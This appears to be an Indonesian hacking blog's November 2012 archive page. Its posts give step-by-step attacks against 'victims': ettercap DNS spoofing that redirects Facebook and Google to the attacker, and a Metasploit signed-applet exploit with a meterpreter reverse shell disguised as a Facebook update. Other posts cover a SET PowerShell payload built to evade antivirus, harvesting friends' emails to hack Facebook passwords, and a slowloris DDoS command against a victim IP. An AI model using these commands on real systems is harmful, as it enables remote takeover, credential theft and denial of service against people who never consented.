Posts

Showing posts from November, 2012

Dns spoof dengan ettercap gui

Image
dulu saya pernah posting cara DNS spoofing di Windows menggunakan Cain and Abel... sekarang saya mau share Dns spoofing di Backtrack dengan Ettercap... kebetulan masih byk yang belum tau dengan statusbaru.com ( jejaring sosial buatan Indonesia ) makanya kita alihkan www.facebook.com  pada jaringan kabel ( LAN ) ataupun Wireles... berikut POC nya Atur dulu dns spoof nya buka console lalu ketikkan perintah locate etter.dns untuk mengetahui letak pengaturan ettercap kemudian atur dns spoofnya di pengaturan etter.dns gedit /usr/local/share/ettercap/etter.dns rubah ipnya menjadi ip kamu disini ip komputer saya 192.168.1.21 rubah di bagian ini  ################################ # microsoft sucks ;) # redirect it to www.linux.org # www.mercadolivre.com.br A 192.168.1.74 *.globo.com        A   192.168.1.74 globo.com          A   192.168.1.74 www.msn.com        A   192.168.1.74 www.hotmail.com    A   192.168.1.74 *.hotmail.com      A   192.168.1.74 www.globo.com      A   192.168.1.74 www.orku
Post a Comment
Read more

Melihat email teman facebook

Image
  Kali ini berbagi mengenai cara melihat email teman di facebook yang kemudian bisa digunakan untuk hacking password facebook, hal ini bisa dilakukan melalui informasi email tersebut, download facebook account hacking melalui informasi email& merupakan salah satu facebook hacking tips and tricks 2013 untuk mencuri informasi email. Firstly/pertama, login ke facebook anda dulu kemudian login ke Akun yahoo yang kalian gunakan login ke facebook atau akun yahoo lainya untuk mengimport kontak dari facebook Nah, udah masuk ke akun yahoo lanjut ke tab �kontak�, klik Import Kontak   Karena kita akan melihat email teman facebook, maka kita pilih/klik facebook nanti akan ada layar pop up yang muncul, klik ya/yes   Tunggu proses import yang di lakukan oleh yahoo Setelah proses impor selesai klik back to contact /selesai dan ini hasilnya Taraaaa�.beratus ratus email muncul di tab baru hehehehe 
Post a Comment
Read more

Exploit windows dengan java signed applet

Image
Kali ini saya mencoba untuk mengexploitasi java dengan  buka terminal ketikkan msfconsole pada terminal use exploit/multi/browser/java_signed_applet set payload windows/meterpreter/reverse_tcp set appletname Update set srvhost 192.168.1.74 (ip lokal kita) set srvport 80 set uripath Updatingfacebook set lhost 192.168.1.74 [ ip lokal kita ] set lport 443   exploit tunggu korban install plug ins dan setelah korban meng running plugin maka sesi telah terbuka tehnik ini bisa digabungkan dengan spoofing pada dns artikelnya bisa di lihat di --> http://trojanzboy.blogspot.com/2012/11/dns-spoof-dengan-ettercap-gui.html atau http://trojanzboy.blogspot.com/2012/11/hack-windows-menggunakan-add-on-dan-dns.html
Post a Comment
Read more

Exploit windows dengan bypass antivirus

Image
test di windows xp sp0/1/2/3 vista 7 Tidak ada habisnya celah pada produk microsoft ini ada banyak sekali bug yang rentan di exploit langsung saja disini saya menggunakan SET (Social enginering toolkit) pada backtrack segera lah beralih ke produk linux satu ini buka console terminal ketik cd /pentest/exploits/set  dan enter lalu ./set dan yes Lalu pilih no 1 social-enginering attack    Lalu pilih no 10 power shell attack vector Lalu pilih no 1 powershell alphanumeric shellcode injector Lalu masukkan ip kalian pada payload listener dan tunggu hingga proses selesai Dari sini dihasilkan file yang bernama x86_powershell_injection.txt yang berada pada pentest > exploits > set > reports > powershell dan rubah ekstensi menjadi . bat , nah file ini yang akan dieksekusi korban agar kita bisa menyusup pada PC korban  berhubung disini korban pentesting menggunakan windows 32 bit maka saya memilih x86poweshell an Lalu pilh yes pada listener now dan pilih x86 bit pada victim mach
Post a Comment
Read more

Membuat wordlist akurat dengan crunch

Image
Hal pertama yang perlu kalian lakukan adalah membuka terminal dan menulis   cd /pentest/passwords/crunch lalu ketikkan peintah more charset.lst   maka akan muncul pilihan charset yang ingin kalian gunakan numeric                       = [0123456789] numeric-space                 = [0123456789 ] symbols14                     = [!@#$%^&*()-_+=] symbols14-space               = [!@#$%^&*()-_+= ] symbols-all                   = [!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/] symbols-all-space             = [!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ] ualpha                        = [ABCDEFGHIJKLMNOPQRSTUVWXYZ] ualpha-space                  = [ABCDEFGHIJKLMNOPQRSTUVWXYZ ] ualpha-numeric                = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789] ualpha-numeric-space          = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ] ualpha-numeric-symbol14       = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()- _+=] ualpha-numeric-symbol14-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ01
Post a Comment
Read more

Hack windows menggunakan add on dan dns spoof

Image
Untuk memasuki system windows 7 ada banyak cara salah satunya memanipulasi add on dari mozilla ketika menjalankan exploit ini browser korban akan muncul dialog penginstalan add on mozilla ketika korban klik install dan menjalankan payload dengan hak akses penuh pada komputer korban dan berhasil telah saya coba pad lab saya berikut POC nya Atur dulu dns spoof nya buka console lalu ketikkan perintah locate etter.dns untuk mengetahui letak pengaturan ettercap kemudian atur dns spoofnya di pengaturan etter.dns gedit /usr/local/share/ettercap/etter.dns rubah ipnya menjadi ip kamu disini ip komputer saya 192.168.1.74 tambahkan facebook di  bagian ini ################################ # microsoft sucks ;) # redirect it to www.linux.org #                                                                           facebook.com       A   192.168.1.74 *facebook.com      A   192.168.1.74 www.facebook.com   A   192.168.1.74 google.com         A   192.168.1.74 *google.com        A   192.168.1.74 www.go
Post a Comment
Read more

Ddos modem,website,dll

Image
Dampak Serangan Dos -Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding. -Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding. Download dulu toolnya  Slowloris.pl lalu taruh di desktop buka terminal ketikkan perintah seperti di bawah cd Desktop/ chmod +x slowloris.pl ./slowloris.pl Lalu jalankan serangan perl ./slowloris.pl -dns 125.165.26.21 - timeout 500 -num 5000 -cache ganti warna hiaju dengan ip korban anda Dan tunggu hingga down seperti   Building sockets.                 Building sockets.                 Building sockets.                 Building sockets.                 Building sockets.                 Sending data. Current stats
Post a Comment
Read more